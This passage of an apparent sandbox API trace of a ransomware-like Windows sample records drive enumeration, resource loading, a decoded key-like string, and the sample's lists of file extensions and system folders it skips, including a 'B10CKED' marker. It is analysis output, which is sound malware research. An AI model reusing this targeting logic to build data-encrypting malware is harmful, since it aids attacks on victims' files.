[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2a7709 [0108.505] GetSidSubAuthority (pSid=0x2a7708*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2a7710 [0108.505] LocalFree (hMem=0x2a7700) returned 0x0 [0108.505] CloseHandle (hObject=0xb8) returned 1 [0108.506] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0108.506] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0108.506] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0108.506] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0108.506] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0108.506] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0108.506] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0108.506] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0108.507] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0108.507] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0108.507] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0108.507] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0108.507] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0108.507] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0108.507] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0108.508] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0108.508] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0108.508] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0108.508] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0108.508] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0108.508] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0108.508] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0108.509] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0108.509] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0108.509] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0108.509] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0108.509] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0108.509] LockResource (hResData=0x516824) returned 0x516824 [0108.509] FreeResource (hResData=0x516824) returned 0 [0108.509] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.509] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.509] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.509] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.509] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.509] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.509] FreeResource (hResData=0x50d64c) returned 0 [0108.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.509] GetCurrentThreadId () returned 0xcb8 [0108.509] GetCurrentThreadId () returned 0xcb8 [0108.509] GetCurrentThreadId () returned 0xcb8 [0108.509] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0108.509] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x13ac65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.510] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.511] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", 